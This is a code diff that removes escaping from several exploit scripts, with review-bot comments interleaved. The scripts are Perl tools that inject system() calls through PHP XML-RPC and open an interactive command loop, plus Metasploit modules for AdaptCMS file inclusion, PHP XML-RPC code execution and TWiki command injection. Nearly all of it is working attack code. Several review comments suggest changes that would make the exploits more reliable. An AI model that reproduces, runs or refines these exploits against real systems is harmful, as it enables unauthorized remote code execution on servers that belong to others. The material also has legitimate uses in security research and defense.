my $req = new HTTP::Request \'POST\' => $host;
|
||||
$req->content_type(\'application/xml\');
|
||||
$req->content($d1.\'system(\\\'\'.$data.\'\\\')\'.$d2);
|
||||
my $req = new HTTP::Request 'POST' => $host;
|
||||
$req->content_type('application/xml');
|
||||
$req->content($d1.'system(\''.$data.'\')'.$d2);
|
||||
|
||||
my $ua = new LWP::UserAgent;
|
||||
$ua->agent(\"xmlrpc exploit R/0.1\");
|
||||
$ua->agent("xmlrpc exploit R/0.1");
|
||||
$ua->timeout($conn_timeout);
|
||||
|
||||
if ($basic_auth_user){
|
||||
$req->authorization_basic($basic_auth_user, $basic_auth_pass)
|
||||
}
|
||||
if ($proxy){
|
||||
$ua->proxy([\'http\'] => $proxy);
|
||||
$ua->proxy(['http'] => $proxy);
|
||||
$req->proxy_authorization_basic($proxy_user, $proxy_pass);
|
||||
}
|
||||
|
||||
|
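Review bot: the line `$req->content($d1.'system(\''.$data.'\')'.$d2);` shows that the unescape was correctly applied one level only: the `\'` that remains is a genuine Perl escape for a literal single quote inside a single-quoted string, and stripping it as well (`\\\'` to `'` instead of `\'`) would have left an unterminated string. The same applies to `version=\"1.0\"` inside the double-quoted `$d1`. Other files in this commit that carry nested quoting should be spot-checked for the same pattern rather than assuming a global `\'` to `'` substitution is safe.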
@ -95,7 +95,7 @@ my $d2 = \";//</name><value>xml exploit R/01</value></param></params></methodCal
|
|||
if ($res->is_success){
|
||||
$reply= $res->content;
|
||||
} else {
|
||||
$reply = \"\";
|
||||
$reply = "";
|
||||
}
|
||||
$reply =~ /(.*).(<pre>warning.*)/mgsi;
|
||||
print ($1);
|
||||
|
@ -103,15 +103,15 @@ my $d2 = \";//</name><value>xml exploit R/01</value></param></params></methodCal
|
|||
|
||||
# show options
|
||||
sub show_usage {
|
||||
print \"Syntax: ./xmlrpc.pl [options] host/uri\\n\\n\";
|
||||
print \"main options\\n\";
|
||||
print \"connection options\\n\";
|
||||
print \"\\t--proxy (http), --proxy_user, --proxy_pass\\n\";
|
||||
print \"\\t--basic_auth_user, --basic_auth_pass\\n\";
|
||||
print \"\\t--timeout \\n\";
|
||||
print \"\\nExample\\n\";
|
||||
print \"bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \\n\";
|
||||
print \"\\n\";
|
||||
print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";
|
||||
print "main options\n";
|
||||
print "connection options\n";
|
||||
print "\t--proxy (http), --proxy_user, --proxy_pass\n";
|
||||
print "\t--basic_auth_user, --basic_auth_pass\n";
|
||||
print "\t--timeout \n";
|
||||
print "\nExample\n";
|
||||
print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";
|
||||
print "\n";
|
||||
exit(1);
|
||||
}
|
||||
|
||||
|
|
|
@ -2,16 +2,16 @@
|
|||
# /| #
|
||||
# | | #
|
||||
# | | #
|
||||
# /\\ ________| |___ #
|
||||
# / \\ \\_______ __/ #
|
||||
# / \\|\\_____ | | _ _ _ _ ()___ #
|
||||
# / /\\ \\ ___ \\ | |<_> / | | | || \\ || | | | #
|
||||
# / /__\\ \\| \\ || | _ /__ |_ | | ||_/ || | |_| #
|
||||
# / ______ \\ | || || | / | | | || \\ || | | #
|
||||
# / / \\ \\ | || || | / |_ |_ |_|| \\|| | \\_| #
|
||||
# \\_/ |\\_/ | || || | ___ _ _ #
|
||||
# | | | || /| | | | | ||\\/| #
|
||||
# \\| \\||/ \\| | |_ |_|| | #
|
||||
# /\ ________| |___ #
|
||||
# / \ \_______ __/ #
|
||||
# / \|\_____ | | _ _ _ _ ()___ #
|
||||
# / /\ \ ___ \ | |<_> / | | | || \ || | | | #
|
||||
# / /__\ \| \ || | _ /__ |_ | | ||_/ || | |_| #
|
||||
# / ______ \ | || || | / | | | || \ || | | #
|
||||
# / / \ \ | || || | / |_ |_ |_|| \|| | \_| #
|
||||
# \_/ |\_/ | || || | ___ _ _ #
|
||||
# | | | || /| | | | | ||\/| #
|
||||
# \| \||/ \| | |_ |_|| | #
|
||||
# | | | || | #
|
||||
# | |_ | || | #
|
||||
# #
|
||||
|
@ -24,36 +24,36 @@
|
|||
|
||||
use IO::Socket;
|
||||
|
||||
print \"XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\\n\";
|
||||
print "XMLRPC remote commands execute exploit by dukenn (http://asteam.org)\n";
|
||||
|
||||
if ($ARGV[0] && $ARGV[1])
|
||||
{
|
||||
$host = $ARGV[0];
|
||||
$xml = $ARGV[1];
|
||||
$sock = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$host\", PeerPort => \"80\") || die \"connecterror\\n\";
|
||||
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "connecterror\n";
|
||||
while (1) {
|
||||
print \'[\'.$host.\']# \';
|
||||
print '['.$host.']# ';
|
||||
$cmd = <STDIN>;
|
||||
chop($cmd);
|
||||
last if ($cmd eq \'exit\');
|
||||
$xmldata = \"<?xml version=\\\"1.0\\\"?><methodCall><methodName>test.method</methodName><params><param><value><name>\',\'\'));echo \'_begin_\\n\';echo `\".$cmd.\"`;echo \'_end_\';exit;/*</name></value></param></params></methodCall>\";
|
||||
print $sock \"POST \".$xml.\" HTTP/1.1\\n\";
|
||||
print $sock \"Host: \".$host.\"\\n\";
|
||||
print $sock \"Content-Type: text/xml\\n\";
|
||||
print $sock \"Content-Length:\".length($xmldata).\"\\n\\n\".$xmldata;
|
||||
last if ($cmd eq 'exit');
|
||||
$xmldata = "<?xml version=\"1.0\"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_\n';echo `".$cmd."`;echo '_end_';exit;/*</name></value></param></params></methodCall>";
|
||||
print $sock "POST ".$xml." HTTP/1.1\n";
|
||||
print $sock "Host: ".$host."\n";
|
||||
print $sock "Content-Type: text/xml\n";
|
||||
print $sock "Content-Length:".length($xmldata)."\n\n".$xmldata;
|
||||
$good=0;
|
||||
while ($ans = <$sock>)
|
||||
{
|
||||
if ($good == 1) { print \"$ans\"; }
|
||||
if ($good == 1) { print "$ans"; }
|
||||
last if ($ans =~ /^_end_/);
|
||||
if ($ans =~ /^_begin_/) { $good = 1; }
|
||||
}
|
||||
if ($good==0) {print \"Exploit Failed\\n\";exit();}
|
||||
if ($good==0) {print "Exploit Failed\n";exit();}
|
||||
}
|
||||
}
|
||||
else {
|
||||
print \"Usage: perl xml.pl [host] [path_to_xmlrpc]\\n\\n\";
|
||||
print \"Example: perl xml.pl target.com /script/xmlrpc.php\\n\";
|
||||
print "Usage: perl xml.pl [host] [path_to_xmlrpc]\n\n";
|
||||
print "Example: perl xml.pl target.com /script/xmlrpc.php\n";
|
||||
exit;
|
||||
}
|
||||
|
||||
|
|
|
@ -10,35 +10,35 @@
|
|||
use LWP::UserAgent;
|
||||
|
||||
$brws = new LWP::UserAgent;
|
||||
$brws->agent(\"Internet Explorer 6.0\");
|
||||
$brws->agent("Internet Explorer 6.0");
|
||||
|
||||
$host = $ARGV[0];
|
||||
|
||||
if ( !$host )
|
||||
{
|
||||
die(\"Usage: xmlrpcexec.pl http://pathto/xmlrpcserver\");
|
||||
die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver");
|
||||
}
|
||||
|
||||
while ( $host )
|
||||
{
|
||||
|
||||
print \"xmlrpc\\@\\#\";
|
||||
print "xmlrpc\@\#";
|
||||
|
||||
$exec = <STDIN>;
|
||||
$data = \"<?xml version=\\\"1.0\\\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>\',\'\')); system(\'$exec\'); die; /*</name></value></param></params></methodCall>\";
|
||||
$data = "<?xml version=\"1.0\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>','')); system('$exec'); die; /*</name></value></param></params></methodCall>";
|
||||
|
||||
$send = new HTTP::Request POST => $host;
|
||||
$send->content($data);
|
||||
$gots = $brws->request($send);
|
||||
$show = $gots->content;
|
||||
|
||||
if ( $show =~ /<b>([\\d]{1,10})<\\/b><br \\/>(.*)/is )
|
||||
if ( $show =~ /<b>([\d]{1,10})<\/b><br \/>(.*)/is )
|
||||
{
|
||||
print $2 . \"\\n\";
|
||||
print $2 . "\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
print \"$show\\n\";
|
||||
print "$show\n";
|
||||
}
|
||||
|
||||
|
||||
|
|
|
@ -1,12 +1,12 @@
|
|||
##
|
||||
# ) ) ) ( ( ( ( ( ) )
|
||||
# ( /(( /( ( ( /( ( ( ( )\\ ))\\ ) )\\ ))\\ ) )\\ ) ( /( ( /(
|
||||
# )\\())\\()))\\ ) )\\()) )\\ )\\ )\\ (()/(()/( ( (()/(()/((()/( )\\()) )\\())
|
||||
# ((_)((_)\\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\\ /(_))(_))/(_))(_)\\|((_)\\
|
||||
#__ ((_)((_)/(_))___ ((_)\\ _ )\\ )\\___)\\ _ )\\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
|
||||
#\\ \\ / / _ (_)) __\\ \\ / (_)_\\(_)(/ __(_)_\\(_) _ \\| \\| __| _ \\ | |_ _|| \\| | |/ /
|
||||
# \\ V / (_) || (_ |\\ V / / _ \\ | (__ / _ \\ | /| |) | _|| / |__ | | | .` | \' <
|
||||
# |_| \\___/ \\___| |_| /_/ \\_\\ \\___/_/ \\_\\|_|_\\|___/|___|_|_\\____|___||_|\\_|_|\\_\\
|
||||
# ( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
|
||||
# )\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
|
||||
# ((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
|
||||
#__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
|
||||
#\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /
|
||||
# \ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <
|
||||
# |_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
|
||||
# .WEB.ID
|
||||
##
|
||||
|
||||
|
@ -17,7 +17,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
@ -28,53 +28,53 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'AdaptCMS 2.0.1 Beta Released Remote File Inclusion Exploit',
|
||||
'Description' => %q{
|
||||
This module can be used to exploit Remote File Inclusion in AdaptCMS 2.0.1 or earlier in file /inc/smarty/libs/init.php.
|
||||
|
||||
},
|
||||
\'Author\' => [ \'v3n0m\' , \'Yogyacarderlink-Indonesia\' ],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision:$\',
|
||||
\'References\' =>
|
||||
'Author' => [ 'v3n0m' , 'Yogyacarderlink-Indonesia' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision:$',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2010-2618\' ],
|
||||
[ \'BID\', \'41116\' ],
|
||||
[ 'CVE', '2010-2618' ],
|
||||
[ 'BID', '41116' ],
|
||||
],
|
||||
\'Privileged\' => false,
|
||||
\'Payload\' =>
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
\'DisableNops\' => true,
|
||||
\'Compat\' =>
|
||||
'DisableNops' => true,
|
||||
'Compat' =>
|
||||
{
|
||||
\'ConnectionType\' => \'find\',
|
||||
'ConnectionType' => 'find',
|
||||
},
|
||||
\'Space\' => 262144, # 256k
|
||||
'Space' => 262144, # 256k
|
||||
},
|
||||
\'Platform\' => \'php\',
|
||||
\'Arch\' => ARCH_PHP,
|
||||
\'Targets\' => [[ \'Automatic\', { }]],
|
||||
\'DisclosureDate\' => \'Oct 12 2010\',
|
||||
\'DefaultTarget\' => 0))
|
||||
'Platform' => 'php',
|
||||
'Arch' => ARCH_PHP,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'DisclosureDate' => 'Oct 12 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options([
|
||||
OptString.new(\'PHPURI\', [ true , \"The URI to request, with the include parameter changed to !URL!\", \'/inc/smarty/libs/init.php?sitepath=!URL!\']),
|
||||
OptString.new('PHPURI', [ true , "The URI to request, with the include parameter changed to !URL!", '/inc/smarty/libs/init.php?sitepath=!URL!']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def php_exploit
|
||||
|
||||
timeout = 0.01
|
||||
uri = datastore[\'PHPURI\'].gsub(\'!URL!\', Rex::Text.to_hex(php_include_url, \"%\"))
|
||||
print_status(\"Trying uri #{uri}\")
|
||||
uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
|
||||
print_status("Trying uri #{uri}")
|
||||
|
||||
response = send_request_raw( {
|
||||
\'global\' => true,
|
||||
\'uri\' => uri,
|
||||
'global' => true,
|
||||
'uri' => uri,
|
||||
},timeout)
|
||||
|
||||
if response and response.code != 200
|
||||
print_error(\"Server returned non-200 status code (#{response.code})\")
|
||||
print_error("Server returned non-200 status code (#{response.code})")
|
||||
end
|
||||
|
||||
handler
|
||||
|
|
|
@ -9,7 +9,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
@ -19,79 +19,79 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# XXX This module needs an overhaul
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'PHP XML-RPC Arbitrary Code Execution\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'PHP XML-RPC Arbitrary Code Execution',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary code execution flaw
|
||||
discovered in many implementations of the PHP XML-RPC module.
|
||||
This flaw is exploitable through a number of PHP web
|
||||
applications, including but not limited to Drupal, Wordpress,
|
||||
Postnuke, and TikiWiki.
|
||||
},
|
||||
\'Author\' => [ \'hdm\', \'cazz\' ],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision: 9929 $\',
|
||||
\'References\' =>
|
||||
'Author' => [ 'hdm', 'cazz' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9929 $',
|
||||
'References' =>
|
||||
[
|
||||
[\'CVE\', \'2005-1921\'],
|
||||
[\'OSVDB\', \'17793\'],
|
||||
[\'BID\', \'14088\'],
|
||||
['CVE', '2005-1921'],
|
||||
['OSVDB', '17793'],
|
||||
['BID', '14088'],
|
||||
],
|
||||
\'Privileged\' => false,
|
||||
\'Platform\' => [\'unix\', \'solaris\'],
|
||||
\'Payload\' => {
|
||||
\'Space\' => 512,
|
||||
\'DisableNops\' => true,
|
||||
\'Keys\' => [\'cmd\', \'cmd_bash\'],
|
||||
'Privileged' => false,
|
||||
'Platform' => ['unix', 'solaris'],
|
||||
'Payload' => {
|
||||
'Space' => 512,
|
||||
'DisableNops' => true,
|
||||
'Keys' => ['cmd', 'cmd_bash'],
|
||||
},
|
||||
\'Targets\' => [ [\'Automatic\', { }], ],
|
||||
\'DefaultTarget\' => 0,
|
||||
\'DisclosureDate\' => \'Jun 29 2005\'
|
||||
'Targets' => [ ['Automatic', { }], ],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jun 29 2005'
|
||||
))
|
||||
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new(\'PATH\', [ true, \"Path to xmlrpc.php\", \'/xmlrpc.php\']),
|
||||
OptString.new('PATH', [ true, "Path to xmlrpc.php", '/xmlrpc.php']),
|
||||
], self.class)
|
||||
|
||||
deregister_options(
|
||||
\'HTTP::junk_params\', # not your typical POST, so don\'t inject params.
|
||||
\'HTTP::junk_slashes\' # For some reason junk_slashes doesn\'t always work, so turn that off for now.
|
||||
'HTTP::junk_params', # not your typical POST, so don't inject params.
|
||||
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
|
||||
)
|
||||
end
|
||||
|
||||
def go(command)
|
||||
|
||||
encoded = command.unpack(\"C*\").collect{|x| \"chr(#{x})\"}.join(\'.\')
|
||||
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
|
||||
wrapper = rand_text_alphanumeric(rand(128)+32)
|
||||
|
||||
cmd = \"echo(\'#{wrapper}\'); passthru(#{ encoded }); echo(\'#{wrapper}\');;\"
|
||||
cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"
|
||||
|
||||
xml =
|
||||
\'<?xml version=\"1.0\"?>\' +
|
||||
\"<methodCall>\" +
|
||||
\"<methodName>\"+ rand_text_alphanumeric(rand(128)+32) + \"</methodName>\" +
|
||||
\"<params><param>\" +
|
||||
\"<name>\" + rand_text_alphanumeric(rand(128)+32) + \"\');#{cmd}//</name>\" +
|
||||
\"<value>\" + rand_text_alphanumeric(rand(128)+32) + \"</value>\" +
|
||||
\"</param></params>\" +
|
||||
\"</methodCall>\";
|
||||
'<?xml version="1.0"?>' +
|
||||
"<methodCall>" +
|
||||
"<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
|
||||
"<params><param>" +
|
||||
"<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
|
||||
"<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +
|
||||
"</param></params>" +
|
||||
"</methodCall>";
|
||||
|
||||
res = send_request_cgi({
|
||||
\'uri\' => datastore[\'PATH\'],
|
||||
\'method\' => \'POST\',
|
||||
\'ctype\' => \'application/xml\',
|
||||
\'data\' => xml,
|
||||
'uri' => datastore['PATH'],
|
||||
'method' => 'POST',
|
||||
'ctype' => 'application/xml',
|
||||
'data' => xml,
|
||||
}, 5)
|
||||
|
||||
if (res and res.body)
|
||||
b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
|
||||
if b
|
||||
return b.captures[0]
|
||||
elsif datastore[\'HTTP::chunked\'] == true
|
||||
elsif datastore['HTTP::chunked'] == true
|
||||
b = /chunked Transfer-Encoding forbidden/.match(res.body)
|
||||
if b
|
||||
raise RuntimeError, \'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.\'
|
||||
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
|
||||
end
|
||||
end
|
||||
end
|
||||
|
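Review bot: the `raise RuntimeError` in the `HTTP::chunked` branch of `go` (`raise RuntimeError, 'Target PHP installation does not support chunked encoding. ...'`) turns a configuration mismatch into an exception thrown from a helper that `check` and `exploit` call for its return value, so neither caller can report it as a `CheckCode` or a clean `print_error`; consider printing the hint and returning `nil`, or letting the callers inspect `res.body` themselves. The change itself is a uniform removal of one escaping layer (`\"` to `"`, `\'` to `'`) and is consistent across the hunk.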
@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def check
|
||||
response = go(\"echo ownable\")
|
||||
response = go("echo ownable")
|
||||
if (!response.nil? and response =~ /ownable/sm)
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
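Review bot: `check` returns `Exploit::CheckCode::Vulnerable` only when `go("echo ownable")` yields a body containing `ownable`, but with `HTTP::chunked` set the `go` helper above raises `RuntimeError` instead of returning, so `check` can end in an exception rather than a `CheckCode`; wrap the call or have `go` return `nil` on that path. Minor style: `!response.nil? and response =~ /ownable/sm` mixes `!` with the low-precedence `and`; `response && response =~ /ownable/` reads more idiomatically.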
@ -110,12 +110,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
response = go(payload.encoded)
|
||||
if response == nil
|
||||
print_error(\'exploit failed: no response\')
|
||||
print_error('exploit failed: no response')
|
||||
else
|
||||
if response.length == 0
|
||||
print_status(\'exploit successful\')
|
||||
print_status('exploit successful')
|
||||
else
|
||||
print_status(\"Command returned #{response}\")
|
||||
print_status("Command returned #{response}")
|
||||
end
|
||||
handler
|
||||
end
|
||||
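Review bot: `handler` is reached only in the `else` branch, after `go(payload.encoded)` has returned a body, while `go` posts with a 5-second timeout (`}, 5)` above); a payload that does not return (a shell that stays connected, for instance) blocks `passthru` and the HTTP response past that timeout, so the module prints `exploit failed: no response` and never calls `handler` even though the payload may have executed. Call `handler` unconditionally after the request and treat a timeout as inconclusive rather than as failure.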
|
|
|
@ -9,7 +9,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
@ -18,42 +18,42 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
\'Name\' => \'TWiki Search Function Arbitrary Command Execution\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'TWiki Search Function Arbitrary Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the search component of TWiki.
|
||||
By passing a \'search\' parameter containing shell metacharacters to the
|
||||
\'WebSearch\' script, an attacker can execute arbitrary OS commands.
|
||||
By passing a 'search' parameter containing shell metacharacters to the
|
||||
'WebSearch' script, an attacker can execute arbitrary OS commands.
|
||||
},
|
||||
\'Author\' =>
|
||||
'Author' =>
|
||||
[
|
||||
# Unknown - original discovery
|
||||
\'jduck\' # metasploit version
|
||||
'jduck' # metasploit version
|
||||
],
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Version\' => \'$Revision: 9671 $\',
|
||||
\'References\' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 9671 $',
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2004-1037\' ],
|
||||
[ \'OSVDB\', \'11714\' ],
|
||||
[ \'BID\', \'11674\' ],
|
||||
[ \'URL\', \'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch\' ]
|
||||
[ 'CVE', '2004-1037' ],
|
||||
[ 'OSVDB', '11714' ],
|
||||
[ 'BID', '11674' ],
|
||||
[ 'URL', 'http://twiki.org/cgi-bin/view/Codev/SecurityAlertExecuteCommandsWithSearch' ]
|
||||
],
|
||||
\'Privileged\' => true, # web server context
|
||||
\'Payload\' =>
|
||||
'Privileged' => true, # web server context
|
||||
'Payload' =>
|
||||
{
|
||||
\'DisableNops\' => true,
|
||||
\'BadChars\' => \' \',
|
||||
\'Space\' => 1024,
|
||||
'DisableNops' => true,
|
||||
'BadChars' => ' ',
|
||||
'Space' => 1024,
|
||||
},
|
||||
\'Platform\' => [ \'unix\' ],
|
||||
\'Arch\' => ARCH_CMD,
|
||||
\'Targets\' => [[ \'Automatic\', { }]],
|
||||
\'DisclosureDate\' => \'Oct 01 2004\',
|
||||
\'DefaultTarget\' => 0))
|
||||
'Platform' => [ 'unix' ],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Targets' => [[ 'Automatic', { }]],
|
||||
'DisclosureDate' => 'Oct 01 2004',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new(\'URI\', [ true, \"TWiki bin directory path\", \"/twiki/bin\" ]),
|
||||
OptString.new('URI', [ true, "TWiki bin directory path", "/twiki/bin" ]),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
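Review bot: `'Privileged' => true, # web server context` is contradictory: the comment says the payload runs in the web server's context, which is exactly the unprivileged case the other modules in this commit mark with `'Privileged' => false` (the PHP XML-RPC module above, Family Connections and SugarCRM below). Unless a privileged TWiki deployment is meant, this should be `false` so payload selection and reporting are accurate.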
@ -61,23 +61,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def check
|
||||
content = rand_text_alphanumeric(16+rand(16))
|
||||
test_file = rand_text_alphanumeric(8+rand(8))
|
||||
cmd_base = datastore[\'URI\'] + \'/view/Main/WebSearch?search=\'
|
||||
test_url = datastore[\'URI\'] + \'/view/Main/\' + test_file
|
||||
cmd_base = datastore['URI'] + '/view/Main/WebSearch?search='
|
||||
test_url = datastore['URI'] + '/view/Main/' + test_file
|
||||
|
||||
# first see if it already exists (it really shouldn\'t)
|
||||
# first see if it already exists (it really shouldn't)
|
||||
res = send_request_raw({
|
||||
\'uri\' => test_url
|
||||
'uri' => test_url
|
||||
}, 25)
|
||||
if (not res) or (res.body.match(content))
|
||||
print_error(\"WARNING: The test file exists already!\")
|
||||
print_error("WARNING: The test file exists already!")
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
# try to create it
|
||||
print_status(\"Attempting to create #{test_url} ...\")
|
||||
search = rand_text_numeric(1+rand(5)) + \"\\\';echo${IFS}\" + content + \"${IFS}>\" + test_file + \".txt;#\\\'\"
|
||||
print_status("Attempting to create #{test_url} ...")
|
||||
search = rand_text_numeric(1+rand(5)) + "\';echo${IFS}" + content + "${IFS}>" + test_file + ".txt;#\'"
|
||||
res = send_request_raw({
|
||||
\'uri\' => cmd_base + Rex::Text.uri_encode(search)
|
||||
'uri' => cmd_base + Rex::Text.uri_encode(search)
|
||||
}, 25)
|
||||
if (not res) or (res.code != 200)
|
||||
return Exploit::CheckCode::Safe
|
||||
|
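Review bot: `if (not res) or (res.body.match(content))` followed by `print_error("WARNING: The test file exists already!")` reports a missing response as an already-existing test file; the two conditions need separate messages, and a `nil` response should return `Exploit::CheckCode::Unknown` (or at least say the host did not answer) rather than claiming the file exists. Also note that this `check` is intrusive: the next request writes `test_file + ".txt"` on the target, which is worth stating in the module description so operators know `check` changes state.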
@ -85,20 +85,20 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# try to run it, 500 code == successfully made it
|
||||
res = send_request_raw({
|
||||
\'uri\' => test_url
|
||||
'uri' => test_url
|
||||
}, 25)
|
||||
if (not res) or (not res.body.match(content))
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
|
||||
# delete the tmp file
|
||||
print_status(\"Attempting to delete #{test_url} ...\")
|
||||
search = rand_text_numeric(1+rand(5)) + \"\\\';rm${IFS}-f${IFS}\" + test_file + \".txt;#\\\'\"
|
||||
print_status("Attempting to delete #{test_url} ...")
|
||||
search = rand_text_numeric(1+rand(5)) + "\';rm${IFS}-f${IFS}" + test_file + ".txt;#\'"
|
||||
res = send_request_raw({
|
||||
\'uri\' => cmd_base + Rex::Text.uri_encode(search)
|
||||
'uri' => cmd_base + Rex::Text.uri_encode(search)
|
||||
}, 25)
|
||||
if (not res) or (res.code != 200)
|
||||
print_error(\"WARNING: unable to remove test file (#{test_file})\")
|
||||
print_error("WARNING: unable to remove test file (#{test_file})")
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Vulnerable
|
||||
|
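Review bot: the comment `# try to run it, 500 code == successfully made it` does not match the code under it, which ignores the status code and decides on `res.body.match(content)`; either update the comment or check `res.code` as it says. The delete step is best-effort only: when `res.code != 200` the module prints `WARNING: unable to remove test file (#{test_file})` but still returns `Vulnerable`, so a failed clean-up leaves the marker file on the host, and the warning prints `test_file` without the `.txt` suffix that was actually written, which makes manual removal harder than it needs to be.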
@ -108,21 +108,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
|
||||
search = rand_text_alphanumeric(1+rand(8))
|
||||
search << \"\';\" + payload.encoded + \";#\\\'\"
|
||||
search << "';" + payload.encoded + ";#\'"
|
||||
|
||||
query_str = datastore[\'URI\'] + \'/view/Main/WebSearch\'
|
||||
query_str << \'?search=\'
|
||||
query_str = datastore['URI'] + '/view/Main/WebSearch'
|
||||
query_str << '?search='
|
||||
query_str << Rex::Text.uri_encode(search)
|
||||
|
||||
res = send_request_cgi({
|
||||
\'method\' => \'GET\',
|
||||
\'uri\' => query_str,
|
||||
'method' => 'GET',
|
||||
'uri' => query_str,
|
||||
}, 25)
|
||||
|
||||
if (res and res.code == 200)
|
||||
print_status(\"Successfully sent exploit request\")
|
||||
print_status("Successfully sent exploit request")
|
||||
else
|
||||
raise RuntimeError, \"Error sending exploit request\"
|
||||
raise RuntimeError, "Error sending exploit request"
|
||||
end
|
||||
|
||||
handler
|
||||
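Review bot: `print_status("Successfully sent exploit request")` on `res.code == 200` only confirms that `WebSearch` served the page, not that the injected command ran, and the `raise RuntimeError, "Error sending exploit request"` branch also fires when `res` is `nil` because the 25-second timeout (`}, 25)`) expired while the payload was still running, aborting before `handler` is reached. Prefer calling `handler` regardless and downgrading the non-200 case to a warning. Cosmetic: after the unescape, `";#\'"` keeps a backslash-escaped quote inside a double-quoted string, which Ruby accepts but which is equivalent to `";#'"`.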
|
|
|
@ -5,7 +5,7 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
